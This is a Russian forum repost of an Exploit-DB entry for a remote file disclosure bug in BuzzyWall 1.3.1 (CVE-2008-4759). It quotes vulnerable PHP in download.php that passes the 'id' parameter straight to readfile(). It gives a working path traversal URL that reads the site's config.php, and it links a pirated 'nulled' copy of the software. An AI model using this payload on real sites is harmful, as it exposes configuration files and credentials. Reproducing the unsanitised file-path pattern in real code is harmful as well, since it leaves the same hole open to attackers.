Exploit BuzzyWall 1.3.1 - 'id' Remote File Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6835
Проверка EDB
  1. Пройдено
Автор
B3HZ4D
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-4759
Дата публикации
2008-10-24
Код:
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        +                                                                    +
        +        BuzzyWall Remote File Disclosure Vulnerability              +
        +                                                                    +
        +                     Discovered by b3hz4d                           +
        +                                                                    +
        +                     WwW.DeltaHacking.Net                           +
        +                                                                    +
        +                                                                    +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


		
AUTHOR : b3hz4d
DATE   : 25 oct 2008
SITE   : WwW.DeltaHacking.Net


#####################################################

APPLICATION : BuzzyWall
DOWNLOAD    : http://rapidshare.com/files/155522383/BuzzyWall.v1.3.1.Nulled.zip
VENDOR      : http://www.buzzywall.com

#####################################################


[+] vuln    : ./download.php

               
$file_name = $_GET['id']

               $file_path = $weburl."wallpapers/full/".$file_name;

                     .

                     .

                     .

                     .

               readfile("$file_path");

   

[+] Exploit : http://victim.com/download.php?id=../../config.php



##############################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y and all member in DeltaHacking.Net #

##############################################################################

# milw0rm.com [2008-10-24]
 
Источник
www.exploit-db.com

Похожие темы